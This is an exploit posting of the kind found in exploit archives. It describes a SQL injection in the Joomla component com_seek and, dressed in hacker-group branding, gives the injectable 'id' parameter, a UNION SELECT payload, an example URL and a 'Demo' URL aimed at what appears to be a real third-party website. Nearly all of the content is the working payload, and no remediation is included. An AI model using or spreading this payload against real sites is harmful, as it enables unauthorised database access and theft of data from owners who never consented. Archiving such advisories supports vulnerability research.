Home / os / winme

Joomla Component com_seek SQL Injection Vulnerability

Posted on 13 March 2010

===================================================== Joomla Component com_seek SQL Injection Vulnerability ===================================================== [~]######################################### InformatioN #############################################[~] [~] Title : Joomla Component com_seek SQL Injection [~] Author : DevilZ TM By D3v1l [~] Homepage : http://www.DEVILZTM.com [~]######################################### ExploiT #############################################[~] [~] Vulnerable File : http://127.0.0.1/http://www.wsa26.com/index.php?option=com_seek&task=list1&id=[SQL] [~] ExploiT : -1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- [~] Example : http://127.0.0.1/http://www.wsa26.com/index.php?option=com_seek&task=list1&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- [~] Demo : http://www.wsa26.com/index.php?option=com_seek&task=list1&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- # ~ - [ [ : Inj3ct0r : ] ]

 

TOP